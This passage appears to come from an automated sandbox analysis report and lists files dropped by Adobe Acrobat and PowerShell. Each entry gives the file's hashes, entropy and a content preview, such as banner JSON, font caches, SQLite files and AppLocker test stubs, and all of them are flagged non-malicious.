                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):289
                                                                Entropy (8bit):5.2668015953650515
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXRVNjeO2vB3/dVlPIHAR0YUDoAvJf8dPeUkwRe9:YvXKXxj+vR/ZwHAQsGU8Ukee9
                                                                MD5:C3617B02579DF805B734C0034645ABD7
                                                                SHA1:D5030E5F95BA243CD36A46E8EE4339CC37E99659
                                                                SHA-256:286DA556CBBD331DF5D2122DD6697368EFA0CAF422D7D458542610E7A01ACBC3
                                                                SHA-512:A60DB037EFD94A19837B6C4458E59505F0E3FD45B24A4789C01BBB044DD7019D5DB5193F5027C107819ADF41D0EDEB9043C7C62FA6A5ABF06831D8DD32377CE6
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):292
                                                                Entropy (8bit):5.265183018273577
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXRVNjeO2vB3/dVlPIHAR0YUDoAvJfQ1rPeUkwRe9:YvXKXxj+vR/ZwHAQsGY16Ukee9
                                                                MD5:0DFA9E96CDE2E040119B87F771A9FA8B
                                                                SHA1:61FCD7B680A4EA9D4AFA8252881DB2A67334AFD6
                                                                SHA-256:14BB799F6FCC368B049A624265FAA0DB5E7C4B6A6B554F3DE38CA199A653188A
                                                                SHA-512:6B091D778A49C21A6D3EFE00DDF573BE39ECD0DC0E3584E438A08302366A9A84D006823D311ACA7B88F127FDC8FB5157216457A04BB29C12BA82A0C3464F73D6
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):289
                                                                Entropy (8bit):5.282140104179524
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXRVNjeO2vB3/dVlPIHAR0YUDoAvJfFldPeUkwRe9:YvXKXxj+vR/ZwHAQsGz8Ukee9
                                                                MD5:CAA899F9E9F256E1FF58A0BE3F171A28
                                                                SHA1:8D1C0F5C84CC60F8BA07B19397F12B1CF4FBFDD2
                                                                SHA-256:8BE8884185FE5E8426D048BF68F6E347A8FE1A1D300F0DE30D367BBCC065451D
                                                                SHA-512:A3D85887FEF3443B1DFCFF39BCBB630055624803FA5DB51FDD6B67FF937C08FC0DA79A405D96420C6A4E9383E4098D07156B1713CF27D450378171CF287ABFC0
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):295
                                                                Entropy (8bit):5.2972312279046605
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXRVNjeO2vB3/dVlPIHAR0YUDoAvJfzdPeUkwRe9:YvXKXxj+vR/ZwHAQsGb8Ukee9
                                                                MD5:51E134A6F74D95D9594909B432CEE904
                                                                SHA1:44E92706F143D17C6C7187596F0BD24413294A8B
                                                                SHA-256:74A2A028AC39B0AB7BB5EC3DCAE15E0A7E422BB7CF491DAFAD63E0579DD39008
                                                                SHA-512:E034B6387B029384185852D9A33725C731B32BDE563572AA613004A5BDCF9479ADC50157DFAFA4D5FE9A00CA7470195EB3D5EAE52000CF17BB862AED6C35CC86
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):289
                                                                Entropy (8bit):5.27680945158867
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXRVNjeO2vB3/dVlPIHAR0YUDoAvJfYdPeUkwRe9:YvXKXxj+vR/ZwHAQsGg8Ukee9
                                                                MD5:3056BB42C785AAB778965AB102464D01
                                                                SHA1:EA62AB0D85595B880FD0FA7BDA4B37E28BE07787
                                                                SHA-256:A4F932251A63A8AC9796AF949BB23CCF3A9DD7B4D41B5864E9C51608CE1EC01A
                                                                SHA-512:2CB9250D069E885C52D5BE59D8CF4EB1808CEEC189EE5CFAACE05074BE911B64D646D6BAA977DA817DAB08661288A6EA62F53F4E39C1942B65103924E323AFEA
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):284
                                                                Entropy (8bit):5.262451540108527
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXRVNjeO2vB3/dVlPIHAR0YUDoAvJf+dPeUkwRe9:YvXKXxj+vR/ZwHAQsG28Ukee9
                                                                MD5:02C15AD6774728E69C8A3CA13BFC13D3
                                                                SHA1:A7F9D237F0136C17B926592F258EA878F68BED87
                                                                SHA-256:4246E73E4E3FAC4D67B47F91E3C2E7EA2D7ACF6B43AB49975026066E4B94E62A
                                                                SHA-512:41FC5A4EE37E988F4ADB09D1A9CA058F58CC8D5CA7E58DEA12823B1639593E2A62DD3160D38FCA52BBE0C0E6683EEA66E6F7E9F28C59F615A3A7BD3C0077963C
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):291
                                                                Entropy (8bit):5.260515934474982
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXRVNjeO2vB3/dVlPIHAR0YUDoAvJfbPtdPeUkwRe9:YvXKXxj+vR/ZwHAQsGDV8Ukee9
                                                                MD5:65483BE02243A9B96844F232E56499BD
                                                                SHA1:78FAFDADF900D00729EF2199BD2161EDECDAD8F6
                                                                SHA-256:754BE4A457BBDC24D5F8792817A2A8016F512F482A380D4F353948ACFCB1E021
                                                                SHA-512:043436304D002F72BB348251D0480EE3F5EF81C5F5A446AFCE04797A5B533A2D52C20DAF41801E586D9A7A71BB4CDF910D99F577DF8FC8A654237B837E507BA4
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):287
                                                                Entropy (8bit):5.258588141804006
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXRVNjeO2vB3/dVlPIHAR0YUDoAvJf21rPeUkwRe9:YvXKXxj+vR/ZwHAQsG+16Ukee9
                                                                MD5:16E99846756E3A8520A7539380603AA9
                                                                SHA1:55DD48F50DC819158F1766DE859B530CFB3A7B2F
                                                                SHA-256:B4499193D9749F54058D15D5D38DD60AA45E4E68B78656A3BF317E77A2365F26
                                                                SHA-512:5480FCB324C18F4BCEF7A03A83BA1AF84708C2D0136B9226206A551C6CB9009C81806E887936DA5902594C896810C8D16AF1D67BEFA217D3AE77824D7DF3BADD
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):1090
                                                                Entropy (8bit):5.666194860682817
                                                                Encrypted:false
                                                                SSDEEP:24:Yv6XoJhQamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSd:YvZJhWBgkDMUJUAh8cvMd
                                                                MD5:1B44CD0B6341525121C65373A0444576
                                                                SHA1:27C10D3487272F7AE9E61D665D048A100A663EE1
                                                                SHA-256:1E4AF1BE909EC3B57A9D0B2F251EE3E827311240736979BB404376479A7EACDD
                                                                SHA-512:107490109EE726A7F60112C5794EEE170E33A1E6C7BEC1D367F7D6EF6FEC78880E86A8992599D344EABC75071AE23EA009F5498930419D5A173794FB0E1AA67C
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):286
                                                                Entropy (8bit):5.233465363268884
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXRVNjeO2vB3/dVlPIHAR0YUDoAvJfshHHrPeUkwRe9:YvXKXxj+vR/ZwHAQsGUUUkee9
                                                                MD5:8BE0BEFC1D50F1162615C2D3FE59EBA7
                                                                SHA1:DFA05C567576F278DF9555B12D2AA2E2FFE99CB4
                                                                SHA-256:17CB197CC17992693CF15EF7AC7C74DFAB31DA24F092521A21C9FB2648B72835
                                                                SHA-512:DE8D6B98E3BE9EEDD46AA743D3E09F162459074E1F8167B56D6ED32AD4F1DE9DCD7A6440080EC8BC58F481E09B1A152A01AC4F78D674AA5546B26DBA92BDD0CB
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):282
                                                                Entropy (8bit):5.250819544721949
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXRVNjeO2vB3/dVlPIHAR0YUDoAvJTqgFCrPeUkwRe9:YvXKXxj+vR/ZwHAQsGTq16Ukee9
                                                                MD5:C73362AD5FE9F64AD026B09B4D2B3934
                                                                SHA1:D66E004ED24F6472DB60BF43C18FD06D4059AC1A
                                                                SHA-256:E7F647D8734F8833517005268FDAE9A416ECCD527389275A287EC0A154361513
                                                                SHA-512:09B6DE2263E61C9C0AEAF36FBE316386E25F20F3CB7A588C410C03194A6C00CFA37DB5B190F83DD88F133DD3AE12EC5D94C4993ABF4851E3287FE80DF866DF2C
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):4
                                                                Entropy (8bit):0.8112781244591328
                                                                Encrypted:false
                                                                SSDEEP:3:e:e
                                                                MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                Malicious:false
                                                                Preview:....
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):2814
                                                                Entropy (8bit):5.145797528933393
                                                                Encrypted:false
                                                                SSDEEP:24:YwfcflalFB3ayPCaLxh4eUGRPVBNybjc82j0SxaXC92tBx2LSTCjmAw5cAyAC5m8:YwfrBr4eU0ic8Iwy+fBgmAzdl0D9uH
                                                                MD5:28C3007D15C7F226CF24D7B4E7E213CE
                                                                SHA1:6D5C4DD814A47698B2EF3E5C074593F4F38ED959
                                                                SHA-256:179B907906FBE837399B4E1D812343C649AC0812DF1E932F451D180810E29B3C
                                                                SHA-512:7CB403891470F954DFFDDEE6F99EBF7B35FCDCDAC114119A6726D28E903EB36AD8E3B69E937098553C410CC27980919C3824AA9771545F5A998891EEC7E4FDB8
                                                                Malicious:false
                                                                Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"e016e282661130887dca1009911c4c43","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734605798000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"ff94fcf834f5804b2c961bc018e2601e","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734605798000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"4d535ad05c1671e6a37d32c1f2090921","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734605798000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"41043d89156fbd8d28f4d9df1c912eeb","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734605798000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"9c8db07e4bf0a0536e1e68206cc0b7da","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734605798000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"08bd615461e3f1030ccf97030db9521f","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                Category:dropped
                                                                Size (bytes):12288
                                                                Entropy (8bit):1.3195479502910328
                                                                Encrypted:false
                                                                SSDEEP:24:TLKufx/XYKQvGJF7urs9Ohn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMeNtqVpaY:TGufl2GL7ms9WR1CPmPbPah7ypilIV
                                                                MD5:12B0DCB6197C982CC966FF87B27F2F7E
                                                                SHA1:810E3653C077BD1F50EDE5B630175ACBA657A6AB
                                                                SHA-256:5DBED0772CEB0C98CEB1F6FDD405344452891CF92CC840242E9D4F887ABA36F0
                                                                SHA-512:47DDBE8EC33984F86FE5AAC35577F08CFEC48AF48A5F4C55151A8453415ECB933968B8F29C21CC9B55D24D00FB903853AC665E20E36133EEDCD442F152FFAC93
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:SQLite Rollback Journal
                                                                Category:dropped
                                                                Size (bytes):8720
                                                                Entropy (8bit):1.777999951568336
                                                                Encrypted:false
                                                                SSDEEP:48:7McvWR1CPmPbPahKypilIKfqFl2GL7ms/:7FvWfMwbPahKffKVms/
                                                                MD5:2E6912FBF589D1F121D66FD71C331E58
                                                                SHA1:946F6BB5BF0798324648F9654BC93C6C5E514CCA
                                                                SHA-256:BDA025B766BF843F14BA2B6EB73C2280744C88183F6C869F3BE27BB74D0A17AF
                                                                SHA-512:C29A1F75EF70910FD209A97059C28542785CC6B7A8016731EC07A1F548BDCF08353D7A4C71A6F923907163C2C44D5A208A39F17320BC8C11DA319545E838D65F
                                                                Malicious:false
                                                                Preview:.... .c.....a..]..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):66726
                                                                Entropy (8bit):5.392739213842091
                                                                Encrypted:false
                                                                SSDEEP:768:RNOpblrU6TBH44ADKZEgKPkQ0qOuDk0r9HJMQnorM/gZYyu:6a6TZ44ADEKPkQ0fuD3du4CK
                                                                MD5:A47DBDE03F338A2B7415C0E0DAD619FB
                                                                SHA1:BE0F02C12A8B7A8D1F3F0E60D172B916700A6FE9
                                                                SHA-256:AA58C7DA20D917CA5DE46EBE60512FC663AE368A5A9E9EAA76A3B79C521A9A0D
                                                                SHA-512:53321BFD5243D2C464402DB169E010E38292FE89CF638CD4219AA98A2C871C51848C729CE811C3648C806A1FC6EC554D2707B0E999AD265FAD46A176A3C236F2
                                                                Malicious:false
                                                                Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:NlllulJnp/p:NllU
                                                                MD5:BC6DB77EB243BF62DC31267706650173
                                                                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                Malicious:false
                                                                Preview:@...e.................................X..............@..........
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):246
                                                                Entropy (8bit):3.5421404787358357
                                                                Encrypted:false
                                                                SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAmfQMl:Qw946cPbiOxDlbYnuRKs7
                                                                MD5:98C54C912EBB3308D1A93758CDD7E247
                                                                SHA1:F406A316C55A8938999270AB949FBBC73FE2C0E1
                                                                SHA-256:2C05002EB222FB95C0ABF87ABAC5AEC5538A62F67A07A1C432D96A9120A6B22F
                                                                SHA-512:41E133AA8BA33029CD60B1CFECD933F34E403B671A2251220DE1BA1367F12D7488E344117AFCF29F6C03B4B79B1EDF9709EA99071163ECC3176608042ACA1675
                                                                Malicious:false
                                                                Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.5.:.5.6.:.3.4. .=.=.=.....
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:ASCII text, with very long lines (393)
                                                                Category:dropped
                                                                Size (bytes):16525
                                                                Entropy (8bit):5.33860678500249
                                                                Encrypted:false
                                                                SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                                                                MD5:C3FEDB046D1699616E22C50131AAF109
                                                                SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                                                                SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                                                                SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                                                                Malicious:false
